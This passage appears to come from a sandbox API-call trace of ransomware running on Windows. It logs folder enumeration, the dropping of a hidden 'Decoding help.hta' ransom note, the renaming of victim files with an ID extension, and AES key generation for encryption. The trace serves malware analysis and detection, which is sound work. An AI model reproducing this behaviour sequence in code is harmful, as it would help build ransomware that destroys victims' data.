ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7c90 [0049.849] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.849] FindNextFileW (in: hFindFile=0x5d7c90, lpFindFileData=0x9d4fd30 | out: lpFindFileData=0x9d4fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7562dd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7562dd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.849] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.849] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.849] FindNextFileW (in: hFindFile=0x5d7c90, lpFindFileData=0x9d4fd30 | out: lpFindFileData=0x9d4fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b324b00, ftCreationTime.dwHighDateTime=0x1c6e3e3, ftLastAccessTime.dwLowDateTime=0x7562dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1b324b00, ftLastWriteTime.dwHighDateTime=0x1c6e3e3, nFileSizeHigh=0x0, nFileSizeLow=0x195018, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSB1ARFR.ITS", cAlternateFileName="")) returned 1 [0050.218] lstrcpyW (in: lpString1=0x10c96810, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*" [0050.218] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*") returned 68 [0050.218] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\Decoding help.hta" [0050.218] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\decoding help.hta")) returned 0xffffffff [0050.219] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x95c [0057.419] WriteFile (in: hFile=0x95c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x9d4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x9d4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0057.420] CloseHandle (hObject=0x95c) returned 1 [0057.420] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0057.420] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSB1ARFR.ITS") returned -1 [0057.420] lstrlenW (lpString="MSB1ARFR.ITS") returned 12 [0057.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*" [0057.420] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\*.*") returned 68 [0057.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\", lpString2="MSB1ARFR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" [0057.420] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" [0057.420] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" [0057.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\ARFR\\MSB1ARFR.ITS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\arfr\\msb1arfr.its.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5d8 [0060.495] CreateFileMappingA (hFile=0x5d8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb74 [0060.496] CryptAcquireContextA (in: phProv=0x9d4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x9d4fcec*=0x10e285f8) returned 1 [0060.496] CryptGenKey (in: hProv=0x10e285f8, Algid=0x6610, dwFlags=0x1, phKey=0x9d4fce8 | out: phKey=0x9d4fce8*=0x10bc5b90) returned 1 [0060.496] CryptExportKey (in: hKey=0x10bc5b90, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x9d4fbe4, pdwDataLen=0x9d4fce4 | out: pbData=0x9d4fbe4*, pdwDataLen=0x9d4fce4*=0x2c) returned 1 [0060.496] MapViewOfFile (hFileMappingObject=0xb74, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) Thread: id = 600 os_tid = 0xda4 [0048.730] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*", lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8490 [0049.290] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.290] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.290] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.290] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.290] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1ea1accb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ea1accb, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0049.290] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0049.290] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0049.290] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0049.632] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.632] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US" [0049.632] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\*.*" [0049.632] GlobalMemoryStatus (in: lpBuffer=0xa0cfd10 | out: lpBuffer=0xa0cfd10) [0049.632] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x116f9b48, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x38c [0049.637] CloseHandle (hObject=0x38c) returned 1 [0049.637] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7523740, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf7523740, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9f416c90, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x8a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSCommon.dll", cAlternateFileName="")) returned 1 [0049.639] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.639] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.639] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.639] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.640] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0) returned 0 [0049.640] CloseHandle (hObject=0xffffffff) returned 0 [0049.640] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.640] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSCommon.dll") returned -1 [0049.640] lstrlenW (lpString="MSTTSCommon.dll") returned 15 [0049.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.640] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSCommon.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" [0049.640] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" [0049.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.640] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSCommon.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttscommon.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.640] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7b630d6, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf7b630d6, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9f4f9d60, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSDecWrp.dll", cAlternateFileName="")) returned 1 [0049.640] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.640] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.640] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.641] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0) returned 0 [0049.641] CloseHandle (hObject=0xffffffff) returned 0 [0049.641] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.641] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSDecWrp.dll") returned -1 [0049.641] lstrlenW (lpString="MSTTSDecWrp.dll") returned 15 [0049.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.641] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSDecWrp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" [0049.641] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" [0049.641] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.641] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSDecWrp.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsdecwrp.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.641] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf80be232, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xf80be232, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x9f6c4d20, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSTTSEngine.dll", cAlternateFileName="")) returned 1 [0049.641] lstrcpyW (in: lpString1=0x10fbcd80, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.641] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.642] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" [0049.642] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta")) returned 0xffffffff [0049.642] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0049.642] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xa0cfcf8, lpOverlapped=0x0) returned 0 [0049.642] CloseHandle (hObject=0xffffffff) returned 0 [0049.642] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0049.642] lstrcmpiW (lpString1="Decoding help.hta", lpString2="MSTTSEngine.dll") returned -1 [0049.642] lstrlenW (lpString="MSTTSEngine.dll") returned 15 [0049.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*" [0049.642] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\*.*") returned 73 [0049.642] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\", lpString2="MSTTSEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" [0049.642] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" [0049.642] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0049.642] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\MSTTSEngine.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\msttsengine.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.642] FindNextFileW (in: hFindFile=0x5d8490, lpFindFileData=0xa0cfd30 | out: lpFindFileData=0xa0cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaf9b217, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xfaf9b217, ftLastAccessTime.dwHighDateTime=0x1ca0417, 